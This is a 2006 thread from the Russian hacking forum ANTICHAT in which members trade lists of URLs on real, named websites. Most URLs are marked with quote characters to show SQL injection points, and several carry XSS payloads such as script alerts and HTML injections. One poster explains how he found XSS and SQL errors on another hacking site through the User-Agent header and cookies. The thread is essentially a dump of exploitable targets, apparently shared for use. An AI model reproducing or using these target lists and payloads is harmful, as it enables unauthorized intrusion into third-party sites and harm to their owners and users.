ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #231  
Старый 15.06.2006, 15:09
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

http://www.hce.ru/proekt/cafe_action2.php3?numk=7'

http://books.begin.ru/tops10.phtml?c_id=107'

http://eng.unionmedia.info/structdoc.html?he_id=231&do_id=199'

http://www.hro.org/php/person_info.php?id=467'1

http://www.ligocom.ru/rindex.php?Var...2%E0&Var1=Item

http://www.bankir.by/modules.php?name=Qwe&ac=print&id=

http://www.kanzler.sbor.ru/?s=3'5

http://www.goclub.ru/resident.html?id=10&PHPSESSID=e24c3a8efffe63d1e0bc 0ea35fac112'2

http://www.ooozao.ru/index.php?id=4'4
 

  #232  
Старый 15.06.2006, 21:06
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617

Репутация: 245
Отправить сообщение для Micr0b с помощью ICQ
По умолчанию

http://www.privat.ua/search?page=1&m...3C%2Fscript%3E

http://www.kuivstar.net в поиску водим '><script>alert('HakNet')</script>
 

  #233  
Старый 15.06.2006, 22:28
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

http://www.tvernews.ru/?newsid=116'29

http://www.spidermania.ru/index.php?action=12&id=9'

http://webchess.ru/index.php?module=...d_img=&stat=ok

http://www.regens.ru/benefits/firms/entrench/

http://ukr-apartments.kiev.ua/apartment.php?PHPSESSID=0b113a9c73caf68cdc7d91becb 27748'5

http://drakkar.good.ru/index.php?act=guest&news_position=-4'

http://www.televek.ru/phones/SonyEri...projects/fma/&

http://squash.com.ua/rus/news/?page=27&news_id=50'0

http://karatedojo.uazone.net/printitem.php3?newsid=8'

http://www.kcnti.ru/orgot/lookorg.php?id=8'

http://www.vw-club.ru/anno/show_anno.php?id=366'

http://www.algis.ru/main.php?f=21&n=10&id=18'0

http://www.gerdabook.ru/vet/view.php?id=5017'2
 

  #234  
Старый 16.06.2006, 06:11
s1z3r
Познающий
Регистрация: 23.05.2006
Сообщений: 55
Провел на форуме:
652099

Репутация: 19
По умолчанию


Последний раз редактировалось s1z3r; 16.06.2006 в 08:03..
 

  #235  
Старый 16.06.2006, 07:32
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839

Репутация: 212
По умолчанию

ВНИМАТЕЛЬНО ЧИТАЕМ ПЕРВЫЙ ПОСТ!!! ССЫЛКИ ОСТАВЛЯТЬ ТОЛЬКО В ТАКОМ ФОРМАТЕ: _http://ваша ссылка
 

  #236  
Старый 16.06.2006, 07:33
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

http://www.extrovert.ru/?id=929

http://www.multi-tech.ru/index.php?goto=gallery&showimage=34'

http://www.notoshoes.ru/singl.php?tp=2&p=7&tid=33400'

http://www.astmui.ru/index.php?id=news_more&news_id=1'

http://ukr-apartments.kiev.ua/apartment.php?PHPSESSID=0b113a9c73caf68cdc7d91becb 27748'5

http://mediapro.com.ua/news/text.php?id=47'3

http://noclick.net.ru/nav.php

http://www.gruzautoland.ru/auto/show.php?id=5'6

http://www.comquest.ru/news/show_news.php?uid=2'3

http://www.cato.ru/pages/151?idpage=148'

http://www.kaz.kz/top/kom.php?id=1'

http://forumy.ru/chumakov/view.php?dat=20031223133317_1&part=8'
 

  #237  
Старый 16.06.2006, 21:19
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


По умолчанию

_www.faq-hack.ru

Там лолки, а не админы. Стоит у них сниффер один в один с нашим, ачатовским. Злость пробрала - решил на баги проверить =). Сниффер первый под руку и попался. Там не фильтровалось имя браузера. Буквально 2 минуты на странице сниффера висел замкнутый цикл с алертом в предзноменование того, что я начал ковырять их сайт =).

Теперь к багам... Долго не искал...лень стало...
Нарыл пассивную xss(это в анонимном мэйлере):
_http://faq-hack.ru/onlinesoft/mail/function.php?name=anyname&mymail=antmail&to=asd@as d.ru[XSS]&theme=anytheme

Вторая бага - ошибка скул. Получить её можно, обратившись к снифферу и передав ему в http-заголовке имя браузера с одинарной кавычкой.
 

  #238  
Старый 16.06.2006, 21:57
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


По умолчанию

_http://customize.ru/gbook/index.php?name="><h1>test1</h1>&mail="><h1>test2</h1>&city="><h1>test3</h1>&mess=anymessage&add=Отправить

Сразу когда по ссыле пройдёте, нифуя не отобразиться. А вот страничку обновите и тогда xss-ки сработают. Просто все данные передаются в кукисы, а когда страницу обновляешь данные из кукисов подставляются в формочки.
 

  #239  
Старый 17.06.2006, 07:11
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

http://www.vdvsn.ru/forum/dialogue.phtml?id=276&forumName=10&page=1'

http://www.v21v.ru/katalog/index.php?new_item=1'

http://www.melodi.ru/index.php?p=1137482278&step=1'

http://order.referats.info/content.php?wnum=390'8

http://www.seneka.ru/index.php?secti...BB%D0%B8%D0%BE

http://www.popugay.com/news/printitem.php?newsid=5'
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ